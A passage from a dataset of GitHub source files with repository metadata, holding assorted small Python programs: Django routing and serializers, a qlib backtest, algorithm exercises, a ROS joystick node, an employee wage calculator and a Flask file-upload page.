]')\n","repo_name":"sa2ajj/DistroTracker","sub_path":"pts/mail/management/commands/pts_dump_subscribers.py","file_name":"pts_dump_subscribers.py","file_ext":"py","file_size_in_byte":3726,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"23173727245","text":"from genericpath import isdir\nimport os\nimport argparse\n\ndef makedirs(path):\n try:\n os.makedirs(path)\n except:\n pass\n\nparser = argparse.ArgumentParser()\nparser.add_argument('name')\n\nargs = parser.parse_args()\n\nname = args.name\n\nbase = os.path.dirname(__file__)\n\nname_ = name.lower()\n\ntest_dir = os.path.join(base, 'tests', name_)\n\nmakedirs(test_dir)\n\npro_path = os.path.join(test_dir, name_ + '.pro')\n\nclass_name = 'Test' + name\nheader = '{}.h'.format(class_name.lower())\ncpp = '{}.cpp'.format(class_name.lower())\n\nwith open(pro_path, 'w', encoding='utf-8') as f:\n f.write(\"\"\"QT += testlib\nSOURCES += main.cpp {}\nHEADERS += {}\n \"\"\".format(cpp, header))\n\nheader_path = os.path.join(test_dir, header)\ncpp_path = os.path.join(test_dir, cpp)\n\nmain_path = os.path.join(test_dir, 'main.cpp')\n\nwith open(main_path, 'w', encoding='utf-8') as f:\n f.write(\"\"\"#include \n#include \"{}\"\nQTEST_MAIN({})\n\"\"\".format(header, class_name))\n\nguard = class_name.upper() + '_H'\n\nwith open(header_path, 'w', encoding='utf-8') as f:\n f.write(\"\"\"#ifndef {}\n#define {}\n#include \nclass {} : public QObject\n{{\n Q_OBJECT\nprivate slots:\n}};\n#endif // {}\n\"\"\".format(guard, guard, class_name, guard))\n\nwith open(cpp_path, 'w', encoding='utf-8') as f:\n f.write(\"\"\"#include \"{}\"\n#include \n\"\"\".format(header))\n\ntests_dir = os.path.join(base, 'tests')\n\ndirs = [n for n in os.listdir(tests_dir) if os.path.isdir(os.path.join(tests_dir, n))]\n\npro_path = os.path.join(tests_dir, 'tests.pro')\n\nwith open(pro_path, 'w', encoding='utf-8') as f:\n f.write(\"\"\"TEMPLATE = subdirs\nSUBDIRS += {}\n\"\"\".format(\" \".join(dirs)))","repo_name":"mugiseyebrows/appveyor-tests","sub_path":"create-test.py","file_name":"create-test.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3266072851","text":"# Do not modify these lines\n__winc_id__ = '71dd124b4a6e4d268f5973db521394ee'\n__human_name__ = 'strings'\n\n# Add your code after this line\n#opdracht part 1\nscorer1 = \"Ruud Gullit\"\nscorer2 = \"Marco van Basten\"\ngoal_0 = 32\ngoal_1 = 54\nscorers = (((scorer1 + \" \" + str(goal_0)) + \", \") + (scorer2 + \" \" + str(goal_1)))\nreport = f\"{scorer1} scored in the {goal_0}nd minute\\n{scorer2} scored in the {goal_1}th minute\"\nprint (report)\n\n\n#opdracht part 2\nplayer = \"Ronald Koeman\" #opdr 1 naam van een speler\nfirst_name = player [0: player.find(\" \")] # opdr 2 variabele die de voornaam van de speler heeft\nprint (first_name) #opdr 2 controle voornaam\n\n#opdracht part 3 lengte van de achternaam van player\nlast_name_len = len(player [player.find(\" \")+1:len(player)])\nprint (last_name_len)\n\n# opdracht part 4 bewerking van de naam player\n# voornaam zie opdracht 2\nlast_name_player = player [player.find(\" \")+1:len(player)]# achternaam van player in een variabele zetten\nname_short = f\"{(first_name[0:1])}. {last_name_player}\"#voor en achternaam samenvoegen\nprint(name_short) \n\n#Opdracht part 5\n#firstname plus uitroepteken \nlengte_voornaam = len(first_name)\n# lengte is gelijk aan het aantal herhalingen\n#spatie tussen herhalingen, maar niet achter de laatste\nchant = (first_name + \"! \") * (lengte_voornaam -1) + (first_name + \"!\")\nprint(chant)\n\n#opdracht part 6 controle van de laatste letter \n#isoleren van de laatste letter van variabele chant\n#laatste letter vergelijken met een \" \" (spatie)\nlaatste_letter = (chant [len(chant) - 1])\ngood_chant = laatste_letter != \" \"\nprint (good_chant)\n\n\n\n\n","repo_name":"IngridDirckx/OpdrStrings","sub_path":"strings/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34737383636","text":"from django.urls import include, path\nfrom rest_framework import routers\n\nfrom financeiro import views, viewsets\n\nfinanceiro_router = routers.DefaultRouter()\nfinanceiro_router.register(\n \"conta-nivel1\",\n viewsets.ContaNivel1ViewSet,\n basename=\"conta_nivel1\",\n)\n\nfinanceiro_router.register(\n \"conta-nivel2\",\n viewsets.ContaNivel2ViewSet,\n basename=\"conta_nivel2\",\n)\nfinanceiro_router.register(\n \"conta-nivel3\",\n viewsets.ContaNivel3ViewSet,\n basename=\"conta_nivel3\",\n)\nfinanceiro_router.register(\n \"conta-nivel4\",\n viewsets.ContaNivel4ViewSet,\n basename=\"conta_nivel4\",\n)\nfinanceiro_router.register(\n \"caixa_banco\",\n viewsets.CaixaBancoViewSet,\n basename=\"caixa_banco\",\n)\n\nfinanceiro_router.register(\n \"tipo_documento_financeiro\",\n viewsets.TipoDocumentoFinanceiroViewSet,\n basename=\"tipo_documento_financeiro\",\n)\n\nfinanceiro_router.register(\n \"lancamento_financeiro\",\n viewsets.LancamentoFinanceiroViewSet,\n basename=\"lancamento_financeiro\",\n)\n\nfinanceiro_router.register(\n \"dado_bancario\",\n viewsets.DadoBancarioViewSet,\n basename=\"dado_bancario\",\n)\n\nfinanceiro_router.register(\n \"forma_pagamento\",\n viewsets.FormaPagamentoViewSet,\n basename=\"forma_pagamento\",\n)\n\nfinanceiro_router.register(\n \"parcela\",\n viewsets.ParcelaViewSet,\n basename=\"parcela\",\n)\n\nfinanceiro_router.register(\n \"tipo_conta\",\n viewsets.TipoContaViewSet,\n basename=\"tipo_conta\",\n)\n\nfinanceiro_router.register(\n \"banco\",\n viewsets.BancoViewSet,\n basename=\"banco\",\n)\n\nconta_nivel1_patterns = [\n path(\n \"conta-nivel1/\",\n views.ContaNivel1ListView.as_view(),\n name=\"conta_nivel1\",\n ),\n path(\n \"conta-nivel1-create/\",\n views.ContaNivel1Create.as_view(),\n name=\"conta_nivel1_create\",\n ),\n path(\n \"conta-nivel1-delete//\",\n views.ContaNivel1Delete.as_view(),\n name=\"conta_nivel1_delete\",\n ),\n path(\n \"conta-nivel1-update//\",\n views.ContaNivel1Update.as_view(),\n name=\"conta_nivel1_update\",\n ),\n]\n\nconta_nivel2_patterns = [\n path(\n \"conta-nivel2/\",\n views.ContaNivel2ListView.as_view(),\n name=\"conta_nivel2\",\n ),\n path(\n \"conta-nivel2-create/\",\n views.ContaNivel2Create.as_view(),\n name=\"conta_nivel2_create\",\n ),\n path(\n \"conta-nivel2-delete//\",\n views.ContaNivel2Delete.as_view(),\n name=\"conta_nivel2_delete\",\n ),\n path(\n \"conta-nivel2-update//\",\n views.ContaNivel2Update.as_view(),\n name=\"conta_nivel2_update\",\n ),\n]\n\nconta_nivel3_patterns = [\n path(\n \"conta-nivel3/\",\n views.ContaNivel3ListView.as_view(),\n name=\"conta_nivel3\",\n ),\n path(\n \"conta-nivel3-create/\",\n views.ContaNivel3Create.as_view(),\n name=\"conta_nivel3_create\",\n ),\n path(\n \"conta-nivel3-delete//\",\n views.ContaNivel3Delete.as_view(),\n name=\"conta_nivel3_delete\",\n ),\n path(\n \"conta-nivel3-update//\",\n views.ContaNivel3Update.as_view(),\n name=\"conta_nivel3_update\",\n ),\n]\n\nconta_nivel4_patterns = [\n path(\n \"conta-nivel4/\",\n views.ContaNivel4ListView.as_view(),\n name=\"conta_nivel4\",\n ),\n path(\n \"conta-nivel4-create/\",\n views.ContaNivel4Create.as_view(),\n name=\"conta_nivel4_create\",\n ),\n path(\n \"conta-nivel4-delete//\",\n views.ContaNivel4Delete.as_view(),\n name=\"conta_nivel4_delete\",\n ),\n path(\n \"conta-nivel4-update//\",\n views.ContaNivel4Update.as_view(),\n name=\"conta_nivel4_update\",\n ),\n]\n\ncaixas_e_bancos_patterns = [\n path(\n \"caixas-e-bancos/\",\n views.CaixaBancoListView.as_view(),\n name=\"caixas_e_bancos\",\n ),\n path(\n \"caixas-e-bancos-create/\",\n views.CaixaBancoCreate.as_view(),\n name=\"caixas_e_bancos_create\",\n ),\n path(\n \"caixas-e-bancos-detail//\",\n views.CaixaBancoDetail.as_view(),\n name=\"caixas_e_bancos_detail\",\n ),\n path(\n \"caixas-e-bancos-update//\",\n views.CaixaBancoUpdate.as_view(),\n name=\"caixas_e_bancos_update\",\n ),\n path(\n \"caixas-e-bancos-delete//\",\n views.CaixaBancoDelete.as_view(),\n name=\"caixas_e_bancos_delete\",\n ),\n]\n\nlancamento_financeiro_patterns = [\n path(\n \"lancamento-financeiro-detail//\",\n views.LancamentoFinanceiroDetailView.as_view(),\n name=\"lancamento_financeiro_detail\",\n ),\n path(\n \"lancamento-financeiro-list/\",\n views.LancamentoFinanceiroListView.as_view(),\n name=\"lancamento_financeiro_list\",\n ),\n path(\n \"lancamento-financeiro-create/\",\n views.LancamentoFinanceiroCreateView.as_view(),\n name=\"lancamento_financeiro_create\",\n ),\n path(\n \"lancamento-financeiro-update//\",\n views.LancamentoFinanceiroUpdateView.as_view(),\n name=\"lancamento_financeiro_update\",\n ),\n path(\n \"lancamento-financeiro-receita-delete//\",\n views.LancamentoFinanceiroDeleteView.as_view(),\n name=\"lancamento_financeiro_delete\",\n ),\n]\n\nparcela_patterns = [\n path(\n \"parcela-delete//\",\n views.ParcelaDeleteView.as_view(),\n name=\"parcela_delete\",\n ),\n path(\n \"parcela-list/\",\n views.ParcelaListView.as_view(),\n name=\"parcela_list\",\n ),\n path(\n \"parcela-update//\",\n views.ParcelaUpdateView.as_view(),\n name=\"parcela_update\",\n ),\n]\n\ntipo_documento_financeiro_patterns = [\n path(\n \"tipo-documento-financeiro-create/\",\n views.TipoDocumentoFinanceiroCreateView.as_view(),\n name=\"tipo_documento_financeiro_create\",\n ),\n path(\n \"tipo-documento-financeiro-delete/\",\n views.TipoDocumentoFinanceiroDeleteView.as_view(),\n name=\"tipo_documento_financeiro_delete\",\n ),\n path(\n \"tipo-documento-financeiro/\",\n views.TipoDocumentoFinanceiroListView.as_view(),\n name=\"tipo_documento_financeiro_list\",\n ),\n path(\n \"tipo-documento-financeiro-update//\",\n views.TipoDocumentoFinanceiroUpdateView.as_view(),\n name=\"tipo_documento_financeiro_update\",\n ),\n]\n\n\nurlpatterns = (\n [\n path(\"api/\", include(financeiro_router.urls)),\n path(\n \"fluxo-caixa/\",\n views.FluxoCaixaView.as_view(),\n name=\"fluxo_caixa\",\n ),\n ]\n + conta_nivel1_patterns\n + conta_nivel2_patterns\n + conta_nivel3_patterns\n + conta_nivel4_patterns\n + caixas_e_bancos_patterns\n + lancamento_financeiro_patterns\n + parcela_patterns\n + tipo_documento_financeiro_patterns\n)\n","repo_name":"TimeNovaData/app_financeiro","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":6884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24786610887","text":"from typing import List\n\n\nclass Solution:\n def maxSubArray(self, nums: List[int]) -> int:\n result = nums[0]\n localSum = nums[0]\n\n for i in range(1, len(nums)):\n localSum = max(localSum, 0) + nums[i]\n result = max(result, localSum)\n\n return result\n\n\nprint(Solution().maxSubArray([-1, -2, -3, -4, -5]))\n","repo_name":"mwjin/top-interview-questions","sub_path":"python/051_maximum_subarray.py","file_name":"051_maximum_subarray.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70910338727","text":"class Untitled:\n\n def answer(self):\n return 42\n\n def factorize(self, n):\n # take a number n and return a list of its factors.\n # how to prime factorize?\n primefactors = []\n # don't include 1\n limit = n+1\n for x in range(2, limit):\n if n % x == 0:\n # add x to the primefactors\n primefactors.append(x)\n primefactors.extend(self.factorize(n/x))\n break \n return primefactors\n\n # can we use a list comprehension?\n # primefactors = [factorize(x) for x in range(2, n/2)]","repo_name":"thunderlai/ProjectEuler","sub_path":"primefactors.py","file_name":"primefactors.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5322895372","text":"import contextlib\nfrom pyke import unique\nfrom pyke import knowledge_base\n\nclass question_base(knowledge_base.knowledge_base):\n r'''\n Each instance keeps track of a related set of questions.\n '''\n def __init__(self, name):\n r'''\n This is only used by the compiler, so only creates an instance\n suitable for pickling.\n\n Specifically, this means that the self.engine is just set to None\n and the instance is not registered with any engine.\n '''\n super(question_base, self).__init__(None, name, register=False)\n\n def add_question(self, question):\n name = question.name\n if name in self.entity_lists:\n raise AssertionError(\"question_base %s: duplicate question, %s\" %\n (self.name, name))\n self.entity_lists[name] = question\n question.set_knowledge_base(self)\n\n def get_ask_module(self):\n if hasattr(self, 'ask_module'): return self.ask_module\n return self.engine.get_ask_module()\n\nclass question(knowledge_base.knowledge_entity_list):\n r'''\n This represents one question in a question_base. It takes care of\n lookup parameters and caching and delegates the work of actually\n asking the user a question to the user_question object by calling its\n 'ask' method passing the format parameters.\n '''\n not_found = unique.unique('question.not_found')\n\n def __init__(self, name, params, answer_param, user_question):\n super(question, self).__init__(name)\n self.params = tuple(params)\n self.answer_param = answer_param\n try:\n self.answer_param_position = list(params).index(answer_param)\n except ValueError:\n raise ValueError(\"question %s: answer parameter, %s, \"\n \"not in params list: %s\" % (answer_param, params))\n self.input_param_positions = \\\n tuple([i for i in list(range(len(self.params))) if i != self.answer_param_position])\n self.user_question = user_question\n self.cache = {}\n\n def __repr__(self):\n return \"\" % \\\n (self.name, ', '.join('$' + p for p in self.params),\n self.answer_param, repr(self.user_question))\n\n def set_knowledge_base(self, question_base):\n self.knowledge_base = question_base\n self.user_question.set_question_base(question_base)\n\n def lookup(self, bindings, pat_context, patterns):\n input_params = tuple((self.params[i],\n str(patterns[i].as_data(pat_context)))\n for i in self.input_param_positions)\n format_params = dict(input_params)\n ans = self.cache.get(input_params, self.not_found)\n if ans is self.not_found:\n ans = self.cache[input_params] = \\\n self.user_question.ask(format_params)\n\n def gen():\n mark = bindings.mark(True)\n end_done = False\n try:\n if patterns[self.answer_param_position] \\\n .match_data(bindings, pat_context, ans):\n bindings.end_save_all_undo()\n end_done = True\n yield\n finally:\n if not end_done: bindings.end_save_all_undo()\n bindings.undo_to_mark(mark)\n\n return contextlib.closing(gen())\n\n def reset(self):\n self.cache.clear()\n\n","repo_name":"nvitucci/pyke","sub_path":"pyke/question_base.py","file_name":"question_base.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"15445580507","text":"'''\nn! means n × (n − 1) × ... × 3 × 2 × 1\n\nFor example, 10! = 10 × 9 × ... × 3 × 2 × 1 = 3628800,\nand the sum of the digits in the number 10! is 3 + 6 + 2 + 8 + 8 + 0 + 0 = 27.\n\nFind the sum of the digits in the number 100!\n'''\n\nimport datetime\nstart = datetime.datetime.now()\n\n\ndef fac(num):\n if num == 1 : return 1\n return num*fac(num-1)\n\n\ndef sum_of_digits(num):\n res = 0 \n for n in str(num) : res += int(n)\n return res \n\n\nprint(sum_of_digits(fac(100)))\nprint(datetime.datetime.now() - start)\n#0.0001s","repo_name":"skypinacolada/Project-Euler","sub_path":"020_Factorial_digit_sum.py","file_name":"020_Factorial_digit_sum.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19616842418","text":"#minikalkulator i python med en input\n\noperatorer =[\"+\",\"-\",\"*\",\"/\"]\n\nk= 0\ninp = str(input(\"Skriv inn regnestykke:\"))\ntekst = []\ntelle = 0\n\n#jobber foreløpig med denne delen av programmet, har ikke helt fått til å\n#legge til hvert tall og operator i en samlet liste.\nfor i in inp:\n telle = telle + 1\n if i==\"+\" or i ==\"-\" or i == \"/\" or i ==\"*\":\n while k> 3)%2 == 1:\n state_data = 0\n pub1.publish(state_data)\n elif (right_sig >> 1)%2 == 1:\n state_data = state_data ^ 1\n pub1.publish(state_data)\n elif right_sig%2 == 1:\n state_data = state_data ^ 2\n pub1.publish(state_data)\n\nrospy.init_node('state',anonymous=True)\n\nrospy.Subscriber('/joy/button', Int32MultiArray, joyB_cb)\n\npub1 = rospy.Publisher('/state', Int32, queue_size=10)\nwhile not rospy.is_shutdown():\n pass\n","repo_name":"nctu-penguin-po/statefile","sub_path":"src/joycontrol.py","file_name":"joycontrol.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5640888282","text":"import qlib\nfrom qlib.data import D\nfrom qlib.constant import REG_CN\nfrom qlib.workflow import R\nfrom qlib.utils import init_instance_by_config, flatten_dict\nfrom qlib.workflow.record_temp import SignalRecord, PortAnaRecord\nfrom qlib.contrib.evaluate import backtest_daily\nfrom qlib.contrib.evaluate import risk_analysis\nfrom qlib.contrib.strategy import TopkDropoutStrategy\nfrom qlib.contrib.data.handler import Alpha158\n\nfrom bias_data_handler import BIASDataHandler\n\nimport pandas as pd\nimport sys\n\nqlib.init(provider_uri=\"/home/greetlist/workspace/data_storage/qlib/\", region=REG_CN)\n\ncode_list = [\"002142.sz\"]\nfields = [\"$high\", \"$open\", \"$low\", \"$close\", \"$vol\", \"Mean($close, 13)\", \"Mean($close, 34)\", \"Mean($close, 55)\"]\nfields = [\"$close\", \"$vol\", \"($close - Mean($close, 13)) / Mean($close, 13) * 100\", \"Mean($close, 34)\", \"Mean($close, 55)\"]\n\ndata = D.features(code_list, fields, start_time=\"2017-01-01\", freq=\"day\")\n#print(data)\n\ndata_handler_config = {\n \"start_time\": \"2007-01-01\",\n \"end_time\": \"2023-11-01\",\n \"fit_start_time\": \"2007-01-01\",\n \"fit_end_time\": \"2022-01-01\",\n #\"instruments\": [\"601607.SH\", \"600759.SH\"],\n \"instruments\": [\"601607.SH\", \"600239.SH\", \"600251.SH\"],\n}\n\nh = Alpha158(**data_handler_config)\n\nprint(h.get_cols())\nprint(h.fetch(col_set=\"label\"))\nprint(h.fetch(col_set=\"feature\"))\n\nsys.exit(0)\n\ntask = {\n \"model\": {\n \"class\": \"LGBModel\",\n \"module_path\": \"qlib.contrib.model.gbdt\",\n \"kwargs\": {\n \"loss\": \"mse\",\n \"colsample_bytree\": 0.8879,\n \"learning_rate\": 0.0421,\n \"subsample\": 0.8789,\n \"lambda_l1\": 205.6999,\n \"lambda_l2\": 580.9768,\n \"max_depth\": 8,\n \"num_leaves\": 210,\n \"num_threads\": 10,\n },\n },\n \"dataset\": {\n \"class\": \"DatasetH\",\n \"module_path\": \"qlib.data.dataset\",\n \"kwargs\": {\n \"handler\": {\n \"class\": \"BIASDataHandler\",\n \"module_path\": \"bias_data_handler\",\n \"kwargs\": data_handler_config,\n },\n \"segments\": {\n \"train\": (\"2007-01-01\", \"2021-12-31\"),\n \"valid\": (\"2022-01-01\", \"2022-12-31\"),\n \"test\": (\"2023-01-01\", \"2023-05-31\"),\n },\n },\n },\n}\n\nmodel = init_instance_by_config(task[\"model\"])\ndataset = init_instance_by_config(task[\"dataset\"])\n\nwith R.start(experiment_name=\"workflow\"):\n # train\n R.log_params(**flatten_dict(task))\n model.fit(dataset)\n\n res = model.predict(dataset).reset_index()\n res.to_csv('test.csv', index=False)\n\n # prediction\n recorder = R.get_recorder()\n sr = SignalRecord(model, dataset, recorder)\n sr.generate()\n\npred_score = pd.read_pickle(\"score.pkl\")[\"score\"]\n\nFREQ = \"day\"\nSTRATEGY_CONFIG = {\n \"topk\": 50,\n \"n_drop\": 5,\n # pred_score, pd.Series\n \"signal\": pred_score,\n}\n\nEXECUTOR_CONFIG = {\n \"time_per_step\": \"day\",\n \"generate_portfolio_metrics\": True,\n}\n\nbacktest_config = {\n \"start_time\": \"2023-06-01\",\n \"end_time\": \"2023-11-01\",\n \"account\": 100000000,\n \"benchmark\": \"601607.SH\",\n \"exchange_kwargs\": {\n \"freq\": FREQ,\n \"limit_threshold\": 0.095,\n \"deal_price\": \"close\",\n \"open_cost\": 0.0005,\n \"close_cost\": 0.0015,\n \"min_cost\": 5,\n },\n}\n\n# strategy object\nstrategy_obj = TopkDropoutStrategy(**STRATEGY_CONFIG)\n# executor object\nexecutor_obj = executor.SimulatorExecutor(**EXECUTOR_CONFIG)\n# backtest\nportfolio_metric_dict, indicator_dict = backtest(executor=executor_obj, strategy=strategy_obj, **backtest_config)\nanalysis_freq = \"{0}{1}\".format(*Freq.parse(FREQ))\n# backtest info\nreport_normal, positions_normal = portfolio_metric_dict.get(analysis_freq)\n\n# analysis\nanalysis = dict()\nanalysis[\"excess_return_without_cost\"] = risk_analysis(\n report_normal[\"return\"] - report_normal[\"bench\"], freq=analysis_freq\n)\nanalysis[\"excess_return_with_cost\"] = risk_analysis(\n report_normal[\"return\"] - report_normal[\"bench\"] - report_normal[\"cost\"], freq=analysis_freq\n)\n\nanalysis_df = pd.concat(analysis) # type: pd.DataFrame\n# log metrics\nanalysis_dict = flatten_dict(analysis_df[\"risk\"].unstack().T.to_dict())\n# print out results\nprint(f\"The following are analysis results of benchmark return({analysis_freq}).\")\nprint(risk_analysis(report_normal[\"bench\"], freq=analysis_freq))\nprint(f\"The following are analysis results of the excess return without cost({analysis_freq}).\")\nprint(analysis[\"excess_return_without_cost\"])\nprint(f\"The following are analysis results of the excess return with cost({analysis_freq}).\")\nprint(analysis[\"excess_return_with_cost\"])\n","repo_name":"Greetlist/qlib_research","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71914330089","text":"from django.db import models\r\n\r\n# Create your models here.\r\n\r\nst = [\"tttttttttttttttttttttttttttttttttttttt\", \"fdassasdfsafsafsafasdfasfasfas\", \"fsdfasfasfdsfasfasfsdfasfd\", \"fsdfasfsafasdfsdfsafsa\"]\r\n\r\nclass Results :\r\n def __init__(self, query=\"sample\", tweets=st, sentiment=0.5, sarcastic_response=\"yeah, right!\"):\r\n self.query = query\r\n self.tweets = tweets\r\n self.sentiment = sentiment\r\n self.sarcastic_response = sarcastic_response\r\n","repo_name":"chitrak7/SarcasmGenerator","sub_path":"sarcasmGen/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29273261955","text":"from rest_framework import serializers\nfrom .models import Product, Stock, StockProduct\n\n\nclass ProductSerializer(serializers.ModelSerializer):\n class Meta:\n model = Product\n fields = ['id', 'title', 'description']\n\n\nclass ProductPositionSerializer(serializers.ModelSerializer):\n class Meta:\n model = StockProduct\n fields = ['id', 'product', 'price', 'quantity']\n\n\nclass StockSerializer(serializers.ModelSerializer):\n positions = ProductPositionSerializer(many=True)\n\n class Meta:\n model = Stock\n fields = ['id', 'address', 'positions']\n\n def create(self, validated_data):\n # достаем связанные данные для других таблиц\n positions = validated_data.pop('positions')\n stock = Stock.objects.create(**validated_data)\n\n for position in positions:\n StockProduct.objects.create(stock=stock, **position)\n\n return stock\n\n def update(self, instance, validated_data):\n # достаем связанные данные для других таблиц\n positions = validated_data.pop('positions')\n stock = super().update(instance, validated_data)\n\n for position in positions:\n try:\n position_product = position.get('product')\n stock_item = StockProduct.objects.get(stock=stock, product=position_product)\n stock_item.quantity = position.get('quantity', stock_item.quantity)\n stock_item.price = position.get('price', stock_item.price)\n stock_item.save()\n except StockProduct.DoesNotExist:\n StockProduct.objects.create(stock=stock, **position)\n\n return stock\n","repo_name":"k0s0y/DJ-56_MaksimenkoHW","sub_path":"3.2-crud/stocks_products/logistic/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22847801527","text":"# https://www.hackerrank.com/challenges/ctci-bubble-sort/problem\n\nn = int(input().strip())\na = list(map(int, input().strip().split(' ')))\n\nswap = 0\nfor i in range(n - 1):\n for j in range(n - 1 - i):\n if a[j] > a[j+1]:\n a[j] , a[j+1] = a[j+1] , a[j]\n swap += 1\nprint(\"Array is sorted in \" + str(swap) + \" swaps.\")\nprint(\"First Element: \" + str(a[0]))\nprint(\"Last Element: \" + str(a[-1]))\n","repo_name":"rednithin/Hackerrank","sub_path":"BubbleSort.py","file_name":"BubbleSort.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24884860407","text":"import json\nimport random\nimport functools\nfrom typing import List, Dict, Any\nfrom com.bridgelabz.employeewage.employeeWageException import EmployeeWageException\n\nclass EmployeeWage :\n #List to store various company objects.\n employee_wage_object_list = []\n\n def __init__ (self, **kwargs):\n self . company_name = kwargs [\"company_name\"]\n self . wage_per_hour = kwargs [\"wage_per_hour\"]\n self . part_time_hour = kwargs [\"part_time_hour\"]\n self . full_time_hour = kwargs [\"full_time_hour\"]\n self . monthly_working_days = kwargs [\"monthly_working_days\"]\n self . max_working_hrs = kwargs [\"max_working_hrs\"]\n self . daily_wage_list = []\n\n def hours_worked_today(self):\n '''\n To get the number of hours work was done today .\n :return: integer signifying hours of work done today\n :rtype: int\n '''\n attendance_today = random.randint(0, 2)\n return 0 if attendance_today == 0\\\n else self.full_time_hour if attendance_today == 1\\\n else self.part_time_hour\n\n def create_daily_wage_list(self):\n '''\n Creates a daily salary list of employee for the company .\n :return: List of daily salaries .\n :rtype: List\n '''\n work_hours_count = 0\n try:\n for _ in range(0, self.monthly_working_days, 1):\n work_hrs_today = self.hours_worked_today()\n if (work_hours_count + work_hrs_today >= self.max_working_hrs):\n break\n self.daily_wage_list.append(work_hrs_today * self.wage_per_hour)\n work_hours_count = work_hours_count + work_hrs_today\n except TypeError:\n raise EmployeeWageException(\"Data corrupt.\")\n\n def get_monthly_wage(self):\n '''\n Calculates total wage from the wage list.\n :return: Total wage\n :rtype: int\n '''\n self.create_daily_wage_list()\n return functools.reduce(lambda x, y : x + y, self . daily_wage_list)\n\n @staticmethod\n def get_emp_wage_object(company_dict):\n \"\"\"\n :param Dictionary of EmployeeWage object data\n :return: EmployeeWage object\n \"\"\"\n employee_wage_object = EmployeeWage(\n company_name = company_dict.get(\"company_name\"),\n wage_per_hour = company_dict.get(\"wage_per_hour\"),\n part_time_hour = company_dict.get(\"part_time_hour\"),\n full_time_hour = company_dict.get(\"full_time_hour\"),\n monthly_working_days = company_dict.get(\"monthly_working_days\"),\n max_working_hrs = company_dict.get(\"max_working_hrs\"),\n daily_wage_list = company_dict.get(\"daily_wage_list\"))\n return employee_wage_object\n\n @staticmethod\n def get_data_from_file(str):\n '''\n Parses through a json file to create a list of EmployeeWage type objects.\n :param str: File path\n :type str: str\n :return: EmployeeWage object list.\n :rtype: list\n '''\n if not str.lower().endswith('.json'):\n raise EmployeeWageException(\"Not a json file.\")\n try:\n with open(str, 'r') as data:\n company_dictionary_list = json.load(data)\n for company_dict in company_dictionary_list:\n emp_wage_obj = EmployeeWage.get_emp_wage_object(company_dict)\n EmployeeWage.employee_wage_object_list.append(emp_wage_obj)\n\n return EmployeeWage.employee_wage_object_list\n except FileNotFoundError:\n raise EmployeeWageException(\"File not found.\")\n\n\ndef driver_function(file):\n '''\n Prints the total monthly wage for employees of different companies.\n :param file:\n :type file:\n '''\n for emp_wage_obj in EmployeeWage.get_data_from_file(file):\n print(\"{} employee earned Rs {}\".format(emp_wage_obj.company_name, emp_wage_obj.get_monthly_wage()))\n\nif __name__ == \"__main__\":\n driver_function('./CompanyDetails.json')","repo_name":"RanaShubham/employee_wage","sub_path":"employeeWage.py","file_name":"employeeWage.py","file_ext":"py","file_size_in_byte":4111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"86737704797","text":"print(\"\\n\\tEsse programa vai ler dois valores e mostrar a \\n\\tdiferença entre eles (o maior valor menos o menor valor)\")\n\nvalor1 = float(input(\"\\n\\n\\tDigite o PRIMEIRO valor: \"))\nvalor2 = float(input(\"\\n\\n\\tDigite o SEGUNDO valor: \"))\n\ndiferenca1 = valor1 - valor2\ndiferenca2 = valor2 - valor1\n\nif valor1>valor2:\n print(\"\\n\\tA diferença entre os valores é: {}\".format(diferenca1))\nelif valor1 \" + txt.readline()\n\n txt1 = open('output/saida.txt', 'w')\n txt1.write(texto)\n txt1.close()\n\n return redirect('/')\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n@app.route('/', methods=['GET', 'POST'])\ndef upload_file():\n if request.method == 'POST':\n # check if the post request has the file part\n if 'file' not in request.files:\n flash('No file part')\n return redirect(request.url)\n file = request.files['file']\n file.filename = \"Teste.txt\"\n # If the user does not select a file, the browser submits an\n # empty file without a filename.\n if file.filename == '':\n flash('No selected file')\n return redirect(request.url)\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n return redirect(url_for('upload_file', name=filename))\n return '''\n \n Upload new File\n

Upload new File

\n
\n \n \n
